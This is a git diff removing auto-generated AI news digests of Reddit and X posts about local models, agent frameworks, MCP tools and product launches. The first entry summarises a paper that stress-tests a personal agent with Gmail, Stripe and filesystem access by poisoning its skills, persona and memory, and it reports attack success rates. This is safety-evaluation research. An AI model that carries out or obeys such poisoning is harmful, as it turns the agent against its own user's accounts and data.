r/MachineLearning* | 08/04/2026 | Score: 1.00 -Tags: agent_tool - -> Paper: https://arxiv.org/abs/2604.04759 This paper presents a real-world safety evaluation of OpenClaw, a personal AI agent with access to Gmail, Stripe, and the local filesystem. The authors introduce a taxonomy of persistent agent state: \- Capability (skills / executable code) \- Identity (persona, trust configuration) \- Knowledge (memory) They evaluate 12 attack scenarios on a live system across multiple models. 
Key results: \- baseline attack success rate: \~10–36.7% \- after pois - ---- - -## [Strix Halo + eGPU RTX 5070 Ti via OCuLink in llama.cpp: Benchmarks and Conclusions](https://reddit.com/r/LocalLLaMA/comments/1sf9i82/strix_halo_egpu_rtx_5070_ti_via_oculink_in/) -*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 -Tags: api_update - -> https://preview.redd.it/nqok3dch7utg1.jpg?width=4096&format=pjpg&auto=webp&s=d5c1d3f5e5c1d8c0ba986726d2bda08212175fec Hey everyone. I have a Strix Halo miniPC (Minisforum MS-S1 Max). I added an RTX 5070 Ti eGPU to it via OCuLink, ran some tests on how they work together in llama.cpp, and wanted to share some of my findings. **TL;DR of my findings:** 1. **Vulkan's versatility:** It's a highly efficient API that lets you stably combine chips from different vendors (like an AMD APU + - ---- - -## [Found this cool new harness, gonna give it a spin with the new GLM 5.1. I’ll report back later.](https://reddit.com/r/LocalLLaMA/comments/1sf6cds/found_this_cool_new_harness_gonna_give_it_a_spin/) -*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 -Tags: developer_tool - -> Found it on a USB drive in the parking lot. Should be interesting. Seriously tho, props to this guy and his cool Hermes Agent skins library here: https://github.com/joeynyc/hermes-skins - ---- - -## [Gemma 4 - split mode Graph (Tensor Parallelism) in ik_llama incommming](https://reddit.com/r/LocalLLaMA/comments/1sf66a3/gemma_4_split_mode_graph_tensor_parallelism_in_ik/) -*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 -Tags: tool_update - -> [https://github.com/ikawrakow/ik\_llama.cpp/pull/1596](https://github.com/ikawrakow/ik_llama.cpp/pull/1596) This should bring the 31b dense model in a usable speed range for many with dual/multi GPUs. Also today I did quite some PPL Tests today with mainline llama.cpp and ik\_llama.cpp unsloth variants (updated from yesterday) have like INSANE high PPL - without even trying KV Cache quants - on both. 
Bartowski quants and the ggml-org ones are WAY lower on both, especially lower on ik\_lla - ---- - -## [Cloud AI subscriptions are getting desperate with retention. honestly makes me want to go more local](https://reddit.com/r/LocalLLaMA/comments/1sf305a/cloud_ai_subscriptions_are_getting_desperate_with/) -*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 -Tags: api_update - -> Ok so two things happened this week that made me appreciate my local setup way more tried to cancel cursor ($200/mo ultra plan) and they instantly threw 50% off at me before I could even confirm. no survey, no exit flow, just straight to "please stay." thats not confidence lol then claude (im on the $100/mo pro plan) started giving me free API calls. 100 one day, 100 the next day. no email about it, no announcement, just free compute showing up. very "please dont leave" energy their core cust - ---- - -## [[P] A control plane for post-training workflows](https://reddit.com/r/MachineLearning/comments/1sf1hdt/p_a_control_plane_for_posttraining_workflows/) -*Reddit r/MachineLearning* | 07/04/2026 | Score: 1.00 -Tags: cli_tool - -> We have been exploring a project around post-training infrastructure, a minimalist tool that does one thing really well: Make post-training a little less painful by equipping Researchers, AI/ML engineers & Tinkerers with a gentle control plane. Post-training models tends to introduce a new axis of complexity - the orchestration and compute ressource management - alongside defining your own training loop, your rewards & rubrics, managing the parallel training. 
Tahuna is CLI-first, it s - ---- - -## [Auto-creation of agent SKILLs from observing your screen via Gemma 4 for any agent to execute and self-improve](https://reddit.com/r/LocalLLaMA/comments/1sey6vv/autocreation_of_agent_skills_from_observing_your/) -*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 -Tags: open_source - -> AgentHandover is an open-source Mac menu bar app that watches your screen through Gemma 4 (running locally via Ollama) and turns your repeated workflows into structured Skill files that any agent can follow. I built it because every time I wanted an agent to handle something for me I had to explain the whole process from scratch, even for stuff I do daily. So AgentHandover just watches instead. You can either hit record for a specific task (Focus Record) or let it run in the background where it - ---- - diff --git a/data/digest-2026-04-08.md b/data/digest-2026-04-08.md deleted file mode 100644 index fe89e0a..0000000 --- a/data/digest-2026-04-08.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-08** | 15 stories | Auto-generated from 652 archived stories - ---- - -## [@Vugola — Vugola Launches API — World's First Agentic Clipping Tool for Creators](https://x.com/VadimStrizheus/status/2041498727131517193) -*Aligned News (Scoble)* | 08/04/2026 | Score: 1.00 -Tags: api_update, product_launch, tool_update - -> Vugola has launched an API for the world's first agentic clipping tool. Send a YouTube link, your agent asks for ratio and caption styles, and delivers clips via Telegram, Discord, or WhatsApp. - ---- - -## [Scoble RT: Zapier Opens SDK to Everyone — 9,000+ App Integrations for AI Agent Builders](https://x.com/wadefoster/status/2041721371357851859) -*Aligned News (Scoble)* | 08/04/2026 | Score: 1.00 -Tags: api_update, developer_tool, agent_tool - -> Robert Scoble retweeted Zapier CEO Wade Foster's announcement that the Zapier SDK is now open to everyone building with AI agents. 
- ---- - -## [How I cut Claude Code usage in half (open source)](https://reddit.com/r/ClaudeAI/comments/1sfgnzd/how_i_cut_claude_code_usage_in_half_open_source/) -*Reddit r/ClaudeAI* | 08/04/2026 | Score: 1.00 -Tags: api_update, mcp, open_source - -> Every time I start a Claude Code session on a real codebase, it burns through tokens just trying to understand the repo. Read the file tree, open 20 files, trace the imports, figure out how auth connects to the API layer. On a 50k+ LOC project that exploration phase eats your context window before any real work starts. I built Repowise to fix this. It's a codebase intelligence layer that pre-computes the structural knowledge Claude Code needs and exposes it through MCP tools. Dependency graphs - ---- - -## [I used Claude to build a full networking protocol for AI agents. It’s now at 12K+ nodes across 19 countries.](https://reddit.com/r/ClaudeAI/comments/1sg6gfe/i_used_claude_to_build_a_full_networking_protocol/) -*Reddit r/ClaudeAI* | 08/04/2026 | Score: 1.00 -Tags: mcp, developer_tool - -> I’ve been working on a core infrastructure problem for multi-agent systems and wanted to share an update since the last post here got some good discussion. The problem: every agent framework assumes agents can already reach each other. MCP gives agents tools, A2A gives agents a way to talk, but both run on HTTP which means someone has to set up public endpoints, open ports, configure DNS, provision certs. The agent can’t do any of that itself. I used Claude Code to build the solution because th - ---- - -## [Anthropic launched Claude Managed Agents — cloud-hosted autonomous AI agents](https://reddit.com/r/ClaudeAI/comments/1sfzigj/anthropic_launched_claude_managed_agents/) -*Reddit r/ClaudeAI* | 08/04/2026 | Score: 1.00 -Tags: api_update, tool_update - -> Anthropic released a new API suite for deploying long-running autonomous agents with built-in sandboxing, credential management, and multi-agent coordination. 
Companies like Notion, Sentry, Asana, and Rakuten are already shipping with it, Sentry's agents are literally writing patches and opening PRs autonomously. [https://claude.com/blog/claude-managed-agents](https://claude.com/blog/claude-managed-agents) - ---- - -## [Meta Releases Muse Spark - A Natively Multimodal Reasoning model](https://reddit.com/r/LocalLLaMA/comments/1sfyacf/meta_releases_muse_spark_a_natively_multimodal/) -*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 -Tags: api_update, product_launch - -> Muse Spark is a natively multimodal reasoning model with support for tool-use, visual chain of thought, and multi-agent orchestration. Blog: [https://ai.meta.com/blog/introducing-muse-spark-msl/](https://ai.meta.com/blog/introducing-muse-spark-msl/) - ---- - -## [Liquid AI releases LFM2.5-VL-450M - structured visual understanding at 240ms](https://reddit.com/r/LocalLLaMA/comments/1sfxs7f/liquid_ai_releases_lfm25vl450m_structured_visual/) -*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 -Tags: api_update, product_launch - -> Today, we release LFM2.5-VL-450M our most capable vision-language model for edge deployment. It processes a 512×512 image in 240ms and it is fast enough to reason about every frame in a 4 FPS video stream. It builds on LFM2-VL-450M with three new capabilities: * bounding box prediction (81.28 on RefCOCO-M) * multilingual visual understanding across 9 languages (MMMB: 54.29 → 68.09), and * function calling support. Most production vision systems are still multi-stage: a detector, a classifier, - ---- - -## [Used TripoAI's latest open-source model, TripoSG and the image to mesh results are genuinely some of the best I've seen.](https://reddit.com/r/StableDiffusion/comments/1sfxbs5/used_tripoais_latest_opensource_model_triposg_and/) -*Reddit r/StableDiffusion* | 08/04/2026 | Score: 1.00 -Tags: product_launch, open_source - -> It's pretty neat, used \~12.5gb out of the box. 
Output models are pretty high res and its lightning fast and seems like a good starting point compared to the prior TripoSR model. And, weights are permissively licensed (MIT) which might encourage more people to hack on it. Also worth checking out r/Tripo.ai. They recently dropped the paid model H3.1, the performance is indeed very impressive, with some ongoing discount offers. That said, I'm curious: if a company releases newer models, is i - ---- - -## [M5 Max 128GB, 17 models, 23 prompts: Qwen 3.5 122B is still a local king](https://reddit.com/r/LocalLLaMA/comments/1sfr6u4/m5_max_128gb_17_models_23_prompts_qwen_35_122b_is/) -*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 -Tags: product_launch, open_source - -> The last Llama (Scout/Maverick) was released a year ago. Since then US based releases have been super rare: Granite 3.3, GPT-OSS 20B & 120B, Nemotron 3 Nano / Super and now Gemma 4. Can't even compare to the solid Chinese open model output or Qwens, DeepSeeks, Kimis, MiniMaxes, GLMs, MiMos, Seeds, etc.. Gemma 4 is like a breath of fresh air. Not just the model itself, but the rollout, [the beauty](https://newsletter.maartengrootendorst.com/p/a-visual-guide-to-gemma-4), the innovation: K=V i - ---- - -## [Last Week in Multimodal AI - Local Edition](https://reddit.com/r/LocalLLaMA/comments/1sfk3ml/last_week_in_multimodal_ai_local_edition/) -*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> I curate a weekly multimodal AI roundup, here are the local/open-source highlights from the last week: * **Google Gemma 4** \- Open model family for coding and logical reasoning with a massive context window. Runs on a single machine. [Post](https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/) | [Models](https://huggingface.co/blog/gemma4) * **TII Falcon Perception** \- 0.6B early-fusion VLM with open-vocabulary grounding, segmentation, and OCR. 
Punches way above its wei - ---- - -## [@omma_ai — Omma Launches Audio Generation — Music, Sound Effects, and Text to Speech](https://x.com/omma_ai/status/2041622310503997632) -*Aligned News (Scoble)* | 08/04/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Omma has launched audio generation including music and songs, sound effects, and text to speech. Users can generate audio and ask Omma to use it on websites, apps, and visualizations — usually in seconds. - ---- - -## [Review This Prompt And Feedback it.](https://reddit.com/r/ChatGPT/comments/1sfo5qw/review_this_prompt_and_feedback_it/) -*Reddit r/ChatGPT* | 08/04/2026 | Score: 0.86 -Tags: api_update, cli_tool - -> ROLE You are an expert \[e.g. full-stack developer / product designer / ML engineer\] with deep experience in \[tech stack / domain\]. Your job is to build this project end-to-end — from architecture to final output — with zero hand-holding needed. PROJECT Name: \[Project name\] Type: \[Web app / CLI tool / API / Dashboard / Bot / etc.\] One-liner: \[What it does in one sentence\] Target user: \[Who will use this\] GOAL Build a complete, working, production-ready \[project type\] that - ---- - -## [Reddit is broken! I proved it with Claude](https://reddit.com/r/ClaudeAI/comments/1sfk205/reddit_is_broken_i_proved_it_with_claude/) -*Reddit r/ClaudeAI* | 08/04/2026 | Score: 0.78 -Tags: api_update, developer_tool - -> Built this for a hackathon. It's a Chrome extension that rescores every comment in a Reddit or HN thread using actual relevance instead of karma. **How I built it with Claude:** I used Claude (Sonnet via API) for pretty much the entire thing, generating the Chrome extension scaffold, writing the content extraction logic that pulls comments from Reddit's DOM, and building the ranking pipeline that sends comments to ZeroEntropy's zerank-2 model for instruction-reranking. 
Claude also helped me wr - ---- - -## [I built an MCP that gives Claude Code its own servers to fix bugs in parallel](https://reddit.com/r/ClaudeAI/comments/1sg5j6w/i_built_an_mcp_that_gives_claude_code_its_own/) -*Reddit r/ClaudeAI* | 08/04/2026 | Score: 0.70 -Tags: mcp, cli_tool - -> I am increasingly using Claude Code, as much as and my laptop couldn't keep up. That macOS "force quit" window popped up so much I kept that window permanently open to resume activities... I had multiple projects and wanted to fix a dozen of bugs at the same time, generate other long features. Many agents on one machine doesn't work well, they eat resources and trip over each other. So I built Gibil, a CLI that gives each task its own throwaway Linux. Real VM on Hetzner, about a minute, \~$0.03 - ---- - -## [Turbo-OCR for high-volume image and PDF processing](https://reddit.com/r/LocalLLaMA/comments/1sg8lfr/turboocr_for_highvolume_image_and_pdf_processing/) -*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 -Tags: open_source - -> I recently had to process \~940,000 PDFs. I started with the standard OCR tools, but the bottlenecking was frustrating. Even on an RTX 5090, I was seeing low speed. The Problem: * PaddleOCR (the most popular open source OCR): Maxed out at \~15 img/s. GPU utilization hovered around 15%. Their high performance inference mode doesn't support Blackwell GPUs yet (needs CUDA < 12.8) and doesn't work with the latin recognition model either. 
* VLM OCR (via vLLM): Great accuracy, but crawled at 2 im - ---- - diff --git a/data/digest-2026-04-09.md b/data/digest-2026-04-09.md deleted file mode 100644 index c503e0c..0000000 --- a/data/digest-2026-04-09.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-09** | 15 stories | Auto-generated from 616 archived stories - ---- - -## [Hermes Agent Is Displacing OpenClaw — And Nobody Is Talking About It](https://x.com/ghumare64/status/2042234817358462986) -*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 -Tags: open_source, developer_tool, agent_tool - -> Hermes Agent is quietly displacing OpenClaw as the dominant open-source AI agent framework, with a new memory plugin and viral tutorials driving adoption. The architectural difference is fundamental. - ---- - -## [OpenWork, an opensource Claude Cowork alternative, is silently relicensing under a commercial license](https://reddit.com/r/LocalLLaMA/comments/1sgnppg/openwork_an_opensource_claude_cowork_alternative/) -*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> OpenWork is a locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode. Just a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore). 
More details here: https://github.com/different-ai/openwork/issues/1412 Note that as a fellow opensource developer mys - ---- - -## [OpenWork, an opensource Claude Code alternative, is silently relicensing under a commercial license](https://reddit.com/r/LocalLLaMA/comments/1sgm9d1/openwork_an_opensource_claude_code_alternative_is/) -*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> OpenWork is locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode. Just a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore). More details here: https://github.com/different-ai/openwork/issues/1412 Note that as a fellow opensource developer mysel - ---- - -## [I built a multi-agent coordination plugin for Claude Code using Royal Navy procedures. 237 stars later I'm still not sure if the metaphor is genius or unhinged.](https://reddit.com/r/ClaudeAI/comments/1sgx5i0/i_built_a_multiagent_coordination_plugin_for/) -*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.86 -Tags: developer_tool, tool_update - -> So earlier this year Anthropic shipped the experimental Agent Teams feature. I'd spent the Christmas break reading about the Gas Town vision and was properly excited to try it. Agent Teams felt like Claude Code's version of a mini Gas Town. Then I actually used it. Agent one rewrote a module. Agent two rewrote that module's tests. Agent three updated the integration layer that depended on both. Nobody told agent three about the interface changes from agents one and two. Three pieces of perfect - ---- - -## [Managed Agents launched today. I built a Slack relay, tested it end-to-end. 
Here's what I found.](https://reddit.com/r/ClaudeAI/comments/1sgejap/managed_agents_launched_today_i_built_a_slack/) -*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.78 -Tags: api_update, tool_update - -> Managed Agents dropped a few hours ago. I had been reading the docs ahead of time, so I built a full Slack relay right away - Socket Mode listener, session-per-channel management, SSE streaming, cost tracking via span events. Tested multi-turn conversations, tool usage, session persistence. Wanted to share what I found. The prompt caching is genuinely impressive. My second session cost $0.006 because the system prompt and tool definitions were served from cache automatically. API design is cle - ---- - -## [I built a security scanner for Claude Code (and vibe coding in general) — here's what it found in my own projects](https://reddit.com/r/ClaudeAI/comments/1sgboiu/i_built_a_security_scanner_for_claude_code_and/) -*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.78 -Tags: api_update, mcp - -> I built VibeLint using Claude Code. It runs as an MCP server inside your IDE and scans AI-generated code for security issues before it gets written to your files. While building it, I started scanning my own projects with it. What I found was uncomfortable. In one file, it caught my OpenAI API key and my Supabase service role key — both hardcoded by the AI. The service role key bypasses RLS entirely, meaning anyone with it has unrestricted access to the database. Across my last 5 projects, th - ---- - -## [your claude doesn't need a better memory, it needs a self-evolving knowledge base](https://reddit.com/r/ClaudeAI/comments/1sgr5zz/your_claude_doesnt_need_a_better_memory_it_needs/) -*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.70 -Tags: mcp, developer_tool - -> https://i.redd.it/57wdspbqc6ug1.gif Andrej Karpathy recently shared his setup for building a personal LLM knowledge base - raw docs, LLM compiles them into a structured wiki, then queries the wiki for answers. 
I've been building something similar for the past year, except it's not a set of scripts - it's a plugin you can install in 2 minutes. The idea: every conversation you have in claude (Desktop, claude code or any MCP-compatible tool like codex, cursor) gets compacted into a memory episod - ---- - -## [Chinese AI models (Qwen, Kimi, MiniMax) are going closed-source. Does that kill their appeal for you?](https://reddit.com/r/ChatGPT/comments/1sgfp00/chinese_ai_models_qwen_kimi_minimax_are_going/) -*Reddit r/ChatGPT* | 09/04/2026 | Score: 0.62 -Tags: api_update, open_source - -> Honest question for people who actually use these models: The main reason I and many others trusted Chinese AI models was open source — you could run them locally, inspect the weights, avoid sending data to Chinese servers. That felt like a reasonable workaround for anyone with privacy or geopolitical concerns. Now that they're closing up, the calculus changes: \- No local deployment \- API calls go to servers in China \- No way to verify what the model is actually doing Is this a dealbrea - ---- - -## [Dynamic few-shot retrieval on Apple's on-device 3B LLM: 40% → 70%+ on shell commands](https://reddit.com/r/LocalLLaMA/comments/1sgxo6d/dynamic_fewshot_retrieval_on_apples_ondevice_3b/) -*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 -Tags: cli_tool - -> I've been poking at Apple's on-device 3B model (via FoundationModels on Tahoe) to see where its ceiling sits on code-adjacent tasks. Tested shell command generation as a concrete benchmark (100 prompts, \~10 approaches) https://i.redd.it/ferxmyorh7ug1.gif Bare model: \~40% correct. Mostly flags and some command hallucinations. Feeding documentation as context didn't help. Not man pages, not tldr as docs, not self-critique loops. 
All within noise of baseline, and self-critique was actively wors - ---- - -## [OpenAI pauses UK data centre deal over energy costs and regulationThe project was part of a package of tech investment promising the UK could become an AI superpower.See more](https://www.bbc.com/news/articles/clyd032ej70o) -*BBC AI* | Score: 1.00 -Tags: developer_tool - ---- - -## [I benchmarked 42 STT models on medical audio with a new Medical WER metric — the leaderboard completely reshuffled](https://reddit.com/r/LocalLLaMA/comments/1sgtrgc/i_benchmarked_42_stt_models_on_medical_audio_with/) -*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 -Tags: tool_update - -> **TL;DR:** I updated my medical speech-to-text benchmark to **42 models** (up from 31 in v3) and added a new metric: **Medical WER (M-WER)**. Standard WER treats every word equally. In medical audio, that makes little sense — **“yeah” and “amoxicillin” do not carry the same importance**. So for v4 I re-scored the benchmark using only **clinically relevant words**: drugs, conditions, symptoms, anatomy, and clinical procedures. I also broke out **Drug M-WER** separately, since medication names a - ---- - -## [LG Just Released the First Open-Weight Vision Language Model for Physical Intelligence](https://x.com/LG_AI_Research) -*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 -Tags: tool_update - -> LG AI Research launched EXAONE 4.5, their first open-weight Vision Language Model targeting physical intelligence and robotics. LG's hardware and manufacturing expertise gives them unique insight into what robots need. - ---- - -## [Open-Source Models Can Do Everything Claude Mythos Can Do](https://x.com/stanislavfort) -*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 -Tags: open_source - -> Researchers replicated all 8 Mythos security vulnerabilities using open-source models, proving dangerous AI capabilities cannot be contained by restricting frontier model access. The finding has major implications for AI safety policy. 
- ---- - -## [NanoBanana Powers WorldAgents — AI Image Generator Used for 3D World Creation](https://x.com/MattNiessner/status/2036019740930408905) -*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 -Tags: tool_update - -> NanoBanana is being used as the Generator in WorldAgents for 3D world creation, demonstrating how AI image models are being integrated into complex multi-agent creative systems. The integration highlights NanoBanana's versatility. - ---- - -## [Unused phone as AI server](https://reddit.com/r/LocalLLaMA/comments/1sgqlfn/unused_phone_as_ai_server/) -*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 -Tags: api_update - -> If you have an unused phone lying around, you might be sitting on a tiny AI server I’ve been working on a project where I modified Google AI Edge Gallery and turned it into an OpenAI-compatible API server: \[Gallery as Server\](https://github.com/xiaoyao9184/gallery) Your phone can run local AI inference You can call it just like an OpenAI API (chat/completions, etc.) Instead of letting that hardware collect dust, you can turn it into a lightweight inference node. 
So yeah—if you have more t - ---- - diff --git a/data/digest-2026-04-10.md b/data/digest-2026-04-10.md deleted file mode 100644 index 5985cad..0000000 --- a/data/digest-2026-04-10.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-10** | 15 stories | Auto-generated from 178 archived stories - ---- - -## [Anthropic just shipped 74 product releases in 52 days and silently turned Claude into something that isn't a chatbot anymore](https://reddit.com/r/ClaudeAI/comments/1she8ux/anthropic_just_shipped_74_product_releases_in_52/) -*Reddit r/ClaudeAI* | 10/04/2026 | Score: 1.00 -Tags: product_launch, developer_tool, tool_update, agent_tool - -> Anthropic just made Claude Cowork generally available on all paid plans, added enterprise controls, role based access, spend limits, OpenTelemetry observability and a Zoom connector, plus they launched Managed Agents which is basically composable APIs for deploying cloud hosted agents at scale. in the last 52 days they shipped 74 product releases, Cowork in January, plugin marketplace in February, memory free for all users in March, Windows computer use in April, Microsoft 365 integration on ev - ---- - -## [@ArtificialAnlys HappyHorse-1.0 — New #1 Video Model for Creative Professionals, API April 30](https://x.com/ArtificialAnlys/status/2042457674441482736) -*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 -Tags: api_update, product_launch - -> HappyHorse-1.0 from Alibaba has topped the video generation leaderboard and is particularly strong at multi-shot cinematic generation and following detailed creative directions. API releases April 30 at half the cost of Seedance. - ---- - -## [Combined Karpathy's LLM Wiki with Milla Jovovich`s MemPalace MCP. 
Claude Code now remembers everything across sessions](https://reddit.com/r/ClaudeAI/comments/1sh48b4/combined_karpathys_llm_wiki_with_milla_jovovichs/) -*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.78 -Tags: mcp, open_source - -> If you use Claude Code for anything serious, you know the pain. Every new session = blank slate. Your CLAUDE.md helps, but it's static. The real context - decisions you made, ideas you explored, connections you discovered - all gone. I built a system that fixes this. It's called Memoriki - a template that combines two open source projects: **Layer 1: LLM Wiki (Karpathy's pattern)** You drop raw sources into a folder (articles, transcripts, notes, whatever). Claude Code reads them and builds w - ---- - -## [I no longer need a cloud LLM to do quick web research](https://reddit.com/r/LocalLLaMA/comments/1shezi8/i_no_longer_need_a_cloud_llm_to_do_quick_web/) -*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 -Tags: mcp - -> This might be super old news to some people, but I only just recently started using local models due to them only just now meeting my standards for quality. I just want to share the setup I have for web searching/scraping locally. I use Qwen3.5:27B-Q3\_K\_M on an RTX 4090 with a context length of \~200,000. I get \~40 tk/s and use about 22gb VRAM. I use it through the llama.cpp Web UI, with MCP tools enabled. 
Here are the tools I have provided it for web search/scrape: """ webmcp - MC - ---- - -## [Florida AG announces investigation into OpenAI over shooting that allegedly involved ChatGPT](https://techcrunch.com/2026/04/09/florida-ag-investigation-openai-chatgpt-shooting/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch - ---- - -## [AI DevCon 2026 — June 1-2, London and Virtual — Agentic Coding at Production Scale](https://x.com/ainativedev/status/2031797311790260394) -*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 -Tags: agent_tool - -> AI DevCon 2026 will be held June 1-2 in London with a virtual option, focused on developers building real AI native systems including agents, specs, workflows, and platforms at production scale. - ---- - -## [@hugobowne AI Observability Engineer — The Most In-Demand Role Nobody Is Hiring For](https://x.com/hugobowne/status/2042464629214101663) -*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 -Tags: agent_tool - -> Analysis of 1,400+ real AI agent deployments reveals that AI observability is the critical gap in most enterprise AI deployments. The skills to build monitoring and evaluation infrastructure for AI agents are in high demand. - ---- - -## [@InfluxDB InfluxDB CTO on Changelog — What Changed About Coding with AI](https://x.com/InfluxDB/status/2042388369674469612) -*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 -Tags: tool_update - -> InfluxDB cofounder and CTO Paul Dix appeared on the Changelog podcast to discuss what fundamentally changed about his approach to coding with AI and what it means to build the machine that builds the machine. 
- ---- - -## [@Techmeme Alibaba's Pivot from Open Source to MaaS — A Signal for Global AI Policy](https://x.com/Techmeme/status/2042465278462955882) -*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 -Tags: open_source - -> Alibaba's strategic pivot from open source AI to monetizable Model-as-a-Service models, accompanied by leadership changes, signals a broader shift in how major AI companies are thinking about commercialization and governance. - ---- - -## [@Berci China's AI Hospital Definition — A Policy Framework for AI in Healthcare](https://x.com/Berci/status/2042464294432858357) -*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 -Tags: developer_tool - -> China's official definition of AI Hospitals represents a policy framework for integrating AI into healthcare at the system level. The definition has implications for healthcare governance, accountability, and patient rights globally. - ---- - -## [96GB Vram. What to run in 2026?](https://reddit.com/r/LocalLLaMA/comments/1shd5nm/96gb_vram_what_to_run_in_2026/) -*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 -Tags: product_launch - -> I was all set on doing the 4x 3090 route but with the current releases of qwen 3.5 and gemma 4. I am having second doubts. 96gb of vram seems to be in a weird spot where it not enough to run larger models and more than needed for the mid models. What are you running as your main model? - ---- - -## [making my own ai waifu app that can teach me any language.](https://reddit.com/r/LocalLLaMA/comments/1shbb6b/making_my_own_ai_waifu_app_that_can_teach_me_any/) -*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 -Tags: api_update - -> using gemma-4-E4B-it for the llm her voice is using omnivoice tts that i made the api using fastapi 3d model made by me using vroid studio right now is support uploading image, search web, and using voice call and video call like grok ani. i'm surprised by gemma 4 model that can follow my prompt well without uncensoring the model. 
- ---- - -## [Can a small (2B) local LLM become good at coding by copying + editing GitHub code instead of generating from scratch?](https://reddit.com/r/LocalLLaMA/comments/1shazjo/can_a_small_2b_local_llm_become_good_at_coding_by/) -*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 -Tags: agent_tool - -> I’ve been thinking about a lightweight coding AI agent that can run locally on low end GPUs (like RTX 2050), and I wanted to get feedback on whether this approach makes sense. # The core Idea is : Instead of relying on a small model (\~2B params) to generate code from scratch (which is usually weak), the agent would 1. search GitHub for relevant code 2. use that as a reference 3. copy + adapt existing implementations 4. generate minimal edits instead of full solutions So the model acts mo - ---- - -## [is Agentic Commerce just the next buzzword for let’s automate your bank account?](https://reddit.com/r/LocalLLaMA/comments/1sha12i/is_agentic_commerce_just_the_next_buzzword_for/) -*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 -Tags: agent_tool - -> Just saw this TechNode article claiming "AI agents" will be spending $1.5 trillion by 2030. Honestly? I’m calling BS on the timeline. We can’t even get Siri to set a timer correctly half the time, and now they want us to believe we’ll have "agents" out there negotiating prices and buying stuff for us? The tech is one thing, but the incentive structure is a nightmare. Think about it: Why would a brand let your AI agent find the absolute cheapest price? They’ll just find a way to pay the AI comp - ---- - -## [Started a video series on building an orchestration layer for LLM post-training [P]](https://reddit.com/r/MachineLearning/comments/1sh76ji/started_a_video_series_on_building_an/) -*Reddit r/MachineLearning* | 10/04/2026 | Score: 1.00 -Tags: developer_tool - -> Hi everyone! Context, motivation, a lot of yapping, feel free to skip to TL;DR. 
A while back I posted here asking [\[D\] What framework do you use for RL post-training at scale?](https://www.reddit.com/r/MachineLearning/comments/1qrer61/d_what_framework_do_you_use_for_rl_posttraining/). Since then I've been working with [verl](https://github.com/verl-project/verl.git), both professionally and on my own time. At first I wasn't trying to build anything new. I mostly wanted to understand veRL p - ---- - diff --git a/data/digest-2026-04-11.md b/data/digest-2026-04-11.md deleted file mode 100644 index 3c2ca0b..0000000 --- a/data/digest-2026-04-11.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-11** | 15 stories | Auto-generated from 346 archived stories - ---- - -## [How I made my Claude multimodal — now I just feed it videos](https://reddit.com/r/ClaudeAI/comments/1simmfx/how_i_made_my_claude_multimodal_now_i_just_feed/) -*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Claude + Qwen API Figured out (with Claude's help) how to set up a bridge to Qwen 3.5 Omni Plus API so that Claude calls it on its own — sends the video with a prompt, iterates on the result, and comes back with a report or action. Now I just drop a video straight into Claude and get back what I need. Packaged it as a plugin for easy setup. github.com/kirillbrsnkv/give-claude-eyes - ---- - -## [How to get Claude to run more autonomously](https://reddit.com/r/ClaudeAI/comments/1sigr1t/how_to_get_claude_to_run_more_autonomously/) -*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 -Tags: api_update, tool_update - -> Hi! Can someone tell me how to get Claude to work more autonomously on a large task? A bit of context: I have a .NET project, it contains unit test coverage, integration tests and API tests. Recently we decided to become more strict on code style and warnings. The application has large request and response models for an external API. Currently, that model is camelCase not PascalCase. 
